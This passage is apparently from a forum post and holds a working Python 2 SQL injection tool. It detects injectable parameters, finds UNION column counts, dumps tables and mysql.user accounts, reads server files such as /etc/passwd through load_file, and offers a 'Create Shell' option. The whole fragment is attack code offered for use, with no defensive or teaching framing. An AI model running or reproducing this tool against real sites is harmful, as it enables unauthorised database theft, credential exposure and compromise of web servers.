"\n\n[-] Error" def menu(page,bypass): clean() header() print "\n[+] Target : ",page,"\n" print "\n[information_schema]\n" print "1 - Show tables" print "2 - Show columns of the a table" print "3 - Show databases" print "4 - Show tables from the a DB" print "5 - Show columns from the a table of the DB" print "\n[mysql.user]\n" print "6 - Show users" print "\n[Others]\n" print "7 - Show details" print "8 - Dump data" print "9 - Fuzz Files with load_file" print "10 - Load files with load_file" print "11 - Create Shell" print "12 - Show log" print "13 - Change target" print "14 - Exit\n\n" try: op = input("[Option] : ") if op == 1: showtables(page,bypass) men() elif op == 2: table = raw_input("\n\n[Table] : ") showcolumns(table,page,bypass) men() elif op == 3: showdbs(page,bypass) men() elif op == 4: db = raw_input("\n\n[DB] : ") showtablesdb(page,db,bypass) men() elif op == 5: db = raw_input("\n\n[DB] : ") table = raw_input("\n\n[Table] : ") showcolumnsdb(page,db,table,bypass) men() elif op == 6: mysqluser(page,bypass) men() elif op == 7: more(page,bypass) men() elif op == 8: table = raw_input("\n\n[Table] : ") col1 = raw_input("\n\n[Column 1] : ") col2 = raw_input("\n\n[Column 2] : ") dumper(page,bypass,table,col1,col2) men() elif op == 9: fuzz(page,bypass) men() elif op == 10: fuzzfile(page,bypass) men() elif op == 11: into(page,bypass) men() elif op == 12: os.system("start logs/"+gethost(page)+".txt") menu(page,bypass) elif op == 13: sta() elif op == 14: sys.exit(1) else: menu(page,bypass) except: menu(page,bypass) def more(web,passx): pass1,pass2 = bypass(passx) otraweb = web print "\n[+] Searching more data\n" hextest = "0x2f6574632f706173737764" web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web) web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb) code0 = toma(web1+pass2) if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)): datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0) datar = re.split("K0BRA",datax[0]) savefile("logs/"+gethost(web)+".txt","") print "[+] Username :",datar[1] print "[+] Database :",datar[2] print "[+] Version :",datar[3],"\n" savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1]) savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2]) savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n") code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if (re.findall("K0BRA",code1)): print "[+] mysql.user : on" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on") code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if (re.findall("K0BRA",code2)): print "[+] information_schema.tables : on" savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on") codetres = toma(web2) if (re.findall("ERTOR854",codetres)): print "[+] load_file() : on" savefile("logs/"+gethost(web)+".txt","[+] load_file() : on") def findlength(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Finding columns length" number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))" for te in range(2,30): number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))" code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2) if (re.findall("K0BRA(.*?)K0BRA",code)): numbers = re.findall("K0BRA(.*?)K0BRA",code) print "[+] Column length :",te print "[+] Numbers",numbers,"print data" sql = "" tex = te + 1 for sqlix in range(2,tex): sql = str(sql)+","+str(sqlix) sqli = str(1)+sql sqla = re.sub(numbers[0],"hackman",sqli) savefile("logs/"+gethost(web)+".txt","\n[Target] : "+web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla+"\n") menu(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla,passx) print "[-] Length dont found\n" reiniciar() def scan(web,passx): pass1,pass2 = bypass(passx) print "\n\n[+] Testing vulnerability" code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2) codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2) if not code==codedos: print "[+] SQLI Detected" findlength(web,passx) else: print "[-] Not Vulnerable" op = raw_input("\n[+] Scan anyway y/n : ") if op == "y": findlength(web,passx) elif op == "n": reiniciar() else: reiniciar() def sta(): clean() header() web = raw_input("\n\n[Page] : ") bypasx = raw_input("\n\n[Bypass] : ") if (re.findall("hackman",web,re.I)): menu(web,bypasx) else: try: scan(web,bypasx) except: print "\n[-] Web offline" reiniciar() installer() sta() #The End
|
|
|
|
|
|
| |
|
Mostrar Mensajes